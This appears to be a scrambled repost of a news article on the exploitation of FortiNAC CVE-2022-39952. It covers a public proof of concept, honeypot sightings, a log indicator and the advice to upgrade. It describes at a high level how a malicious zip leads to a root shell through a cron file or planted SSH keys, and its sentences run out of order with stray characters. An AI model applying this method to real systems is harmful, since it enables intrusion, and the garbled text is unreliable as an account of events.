Make sure to upgrade your FortiNAC as specified in: - Shadowserver 21, 2023Ĭoalition, Inc., also observed an increase in exploitation activity, as well as a rise in scanning for vulnerable instances, following the publicly available PoC. We are seeing FortiNAC CVE-2022-39952 exploitation attempts from multiple IPs in our honeypot sensors. "We are seeing FortiNAC CVE-2022-39952 exploitation attempts from multiple IPs in our honeypot sensors," Shadowserver wrote on Twitter. Hours after Horizon3.ai released the POC, the Shadowserver Foundation, a cybersecurity nonprofit, started to observe threat activity. "It's a very trivial vulnerability due to it being an abuse of logic," he said. Hanley told TechTarget Editorial that the FortiNAC vulnerability is easy to exploit. Under IOCs, he recommended that users check logs for the line "Running configApplianceXml." To weaponize the flaw, Hanley noted that it only took a minute to get a reverse shell as the root user after sending a malicious zip file. "In this case, we write a cron job to /etc/cron.d/, but attackers could also overwrite and binary on the system that is regularly executed or SSH keys to a user profile," Hanley wrote in the blog post. Most significantly, attackers could access SSH keys, which allows administrative access. He noted several ways attackers could gain remote code execution. In addition to a deep-dive analysis with indicators of compromise (IOC), Hanley warned that an unauthenticated attacker could "write arbitrary files on the system and as a result obtain remote code execution in the context of the root user." Penetration testing vendor Horizon3.ai released an automated POC exploit through GitHub Tuesday, along with a blog post by Zach Hanley, chief attack engineer at Horizon3.ai. Fortinet advised upgrading to the latest version. Exploitation requires no user interaction or privileges.įortiNAC is Fortinet's zero-trust access product designed for enterprises to secure a variety of devices, including IT systems, IoT devices, operational technology and industrial control systems. If successful, an unauthenticated attacker could execute unauthorized code or commands on vulnerable FortiNAC web servers. Now, a proof of concept (POC) exploit is available, and exploitation attempts have been observed in the wild.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |